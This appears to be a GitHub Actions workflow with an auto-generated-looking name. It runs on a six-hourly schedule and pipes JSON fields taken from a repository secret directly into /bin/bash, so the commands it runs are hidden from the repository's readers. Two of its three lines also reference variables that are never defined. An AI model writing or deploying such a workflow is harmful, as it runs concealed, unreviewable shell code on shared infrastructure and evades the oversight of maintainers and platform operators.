name: baiqiangda4390
on:
  workflow_dispatch:
  schedule:
    - cron: '53 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: baiqiangda4390
        env:
          q13: ${{ secrets.q13 }}
        run: |
          echo $q13 | jq -r .qbtv9544 | /bin/bash
          echo $stkr1 | jq -r .g5805 | /bin/bash
          echo $dhmcv162 | jq -r .vd16068 | /bin/bash

